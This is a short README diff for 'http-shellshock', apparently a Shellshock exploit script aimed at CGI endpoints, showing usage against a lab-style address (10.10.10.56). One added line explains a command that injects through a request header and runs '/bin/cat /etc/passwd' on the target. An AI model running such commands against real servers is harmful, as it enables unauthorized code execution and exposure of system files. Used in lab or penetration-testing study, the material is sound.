Elevennails/http-shellshock/README.md

         ./http-shellshock.sh -u http://10.10.10.56/cgi-bin/user.sh

-Full paths to binaries may be required as web service user may not have loaded profile
+Full paths to binaries may be required as web service user may not have loaded profile.
+The below command tests a url "Content-Type" and cat's the passwd file in /etc.

          ./http-shellshock.sh -u http://10.10.10.56:80/cgi-bin/user.sh -h 1 -s '/bin/cat /etc/passwd'